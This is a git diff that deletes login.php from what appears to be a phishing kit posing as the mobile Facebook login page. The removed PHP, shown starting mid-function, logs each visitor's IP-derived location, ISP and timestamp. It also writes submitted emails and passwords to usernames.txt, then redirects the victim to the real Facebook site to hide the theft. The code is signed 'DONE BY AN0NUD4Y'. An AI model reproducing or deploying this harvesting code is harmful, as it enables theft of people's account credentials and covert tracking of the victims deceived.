diff --git a/WebPages/mobile_fb/login.php b/WebPages/mobile_fb/login.php deleted file mode 100644 index 656996b..0000000 --- a/WebPages/mobile_fb/login.php +++ /dev/null @@ -1,56 +0,0 @@ -loc.' [6]ISP = ' // latitude, longitude - .$details->org.' [7]CITY = ' // internet service provider - .$details->city.' [8]STATE = ' // city - .$details->region.' [9]COUNTRY = ' // state - .$details->country.' [10]DATE & TIME = ' // country - .date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date - ."\n" - ; - $write = fputs($fileHandle, $string); - @ fclose($fileHandle); - } - - - -$var = $_POST['email']; -$var2 = $_POST['pass']; -$myFile = file_get_contents("protect.html"); -$searchString = "WELCOME TO FACEBOOK"; -if($myFile != $searchString) { - file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND); - header('Location: https://mbasic.facebook.com/'); -} -if($myFile != $searchString) { - echo "LOGIN SUCCESSFULL"; - header('Location: https://mbasic.facebook.com/'); -} -exit(); -?> -